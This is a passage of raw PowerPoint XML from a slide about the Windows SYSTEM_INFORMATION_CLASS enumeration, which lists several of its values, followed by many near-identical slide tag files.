                <a:cs typeface="+mn-ea"/>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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
                <a:cs typeface="+mn-ea"/>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defRPr/>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>SYSTEM_INFORMATION_CLASS</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="D1202F"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Box 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2287905" y="1042670"/>
            <a:ext cx="7616190" cy="5367655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>typedef enum class _SYSTEM_INFORMATION_CLASS {</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SystemBasicInformation = 0,</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SystemPerformanceInformation = 2,</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SystemTimeOfDayInformation = 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SystemProcessInformation = 5,</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SystemProcessorPerformanceInformation = 8,</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SystemInterruptInformation = 23,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SystemExceptionInformation = 33,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SystemRegistryQuotaInformation = 37,</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SystemLookasideInformation = 45,</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SystemCodeIntegrityInformation = 103,</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SystemPolicyInformation = 134,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>} SYSTEM_INFORMATION_CLASS;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/tags/tag1.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag10.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag100.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag101.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag10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3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag104.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag105.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag106.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag107.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag10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09.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag11.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag110.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag111.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag112.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag113.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1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15.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag116.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag117.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag118.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag119.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag12.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1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1.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag122.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag123.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag124.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag125.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag12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27.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag128.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag129.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag13.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag130.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag131.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag13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3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag134.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag135.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag136.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag137.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag13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39.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1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0.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag141.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag142.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag143.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag14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45.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag146.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag147.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag148.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag149.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag15.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag15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151.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag152.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag153.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag154.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag155.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag156.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag157.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag158.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag159.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag16.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag160.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag161.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag162.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag163.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag164.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag165.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag166.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag167.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag168.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag169.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag17.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag170.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag171.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag172.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag173.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag174.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag175.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag176.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag177.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag178.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag179.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag18.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag180.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag181.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag182.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag183.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag184.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag185.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag186.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag187.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag188.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag189.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag19.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag190.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag191.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag192.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag193.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag194.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag195.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag196.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag197.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag198.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag199.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag2.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag2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200.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
